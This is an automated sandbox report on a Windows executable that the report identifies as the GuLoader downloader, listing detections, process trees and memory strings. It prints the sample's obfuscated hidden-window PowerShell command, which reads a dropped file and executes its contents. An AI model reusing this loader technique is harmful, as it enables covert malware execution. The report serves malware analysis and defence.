Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hornswoggle.exe

Overview

General Information

Sample name:Hornswoggle.exe
Analysis ID:1583356
MD5:46b874a16ba720eb5d39a0e7f9a87291
SHA1:9bc00b5338a4fef7db170cb7a8d07dbe28bd416b
SHA256:da2bc53b2715ed2d46c9ffdb184a3f926269e983981a266a7442b3e7ff6b584c
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sample uses process hollowing technique
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • Hornswoggle.exe (PID: 4028 cmdline: "C:\Users\user\Desktop\Hornswoggle.exe" MD5: 46B874A16BA720EB5D39A0E7F9A87291)
    • powershell.exe (PID: 6400 cmdline: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4508 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2152 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 936 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5544 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6164 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5952 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7160 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7868 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7880 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 5912 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6876 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1260 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5052 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2560 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4336 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7240 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2488 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1576 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8020 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7048 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 4580 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1232 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4456 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1196 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4184 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6964 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7588 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5072 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7444 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2880 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 7100 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1312 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 332 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7820 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7764 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6516 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5056 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.23291877014.000000000C190000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) ", CommandLine: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Hornswoggle.exe", ParentImage: C:\Users\user\Desktop\Hornswoggle.exe, ParentProcessId: 4028, ParentProcessName: Hornswoggle.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) ", ProcessId: 6400, ProcessName: powershell.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: Hornswoggle.exeReversingLabs: Detection: 50%
    Source: Hornswoggle.exeVirustotal: Detection: 72%Perma Link
    Machine Learning detection for sample
    Source: Hornswoggle.exeJoe Sandbox ML: detected
    Source: Hornswoggle.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Hornswoggle.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: stem.Core.pdbD source: powershell.exe, 00000002.00000002.23289519078.0000000008B80000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.23291511273.0000000009400000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
    Source: powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000002.00000002.23278768511.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
    Source: Hornswoggle.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: Hornswoggle.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
    Source: powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004051BA
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_004049F90_2_004049F9
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_004064AE0_2_004064AE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04FBB7882_2_04FBB788
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_092878F22_2_092878F2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_092812202_2_09281220
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_092846D02_2_092846D0
    Source: Hornswoggle.exeStatic PE information: invalid certificate
    Source: Hornswoggle.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal76.troj.evad.winEXE@4409/14@0/0
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404486
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
    Source: C:\Users\user\Desktop\Hornswoggle.exeFile created: C:\Users\user\AppData\Roaming\chinaJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:304:WilStaging_02
    Source: C:\Users\user\Desktop\Hornswoggle.exeFile created: C:\Users\user\AppData\Local\Temp\nshA395.tmpJump to behavior
    Source: Hornswoggle.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\Hornswoggle.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Hornswoggle.exeReversingLabs: Detection: 50%
    Source: Hornswoggle.exeVirustotal: Detection: 72%
    Source: C:\Users\user\Desktop\Hornswoggle.exeFile read: C:\Users\user\Desktop\Hornswoggle.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Hornswoggle.exe "C:\Users\user\Desktop\Hornswoggle.exe"
    Source: C:\Users\user\Desktop\Hornswoggle.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Users\user\Desktop\Hornswoggle.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
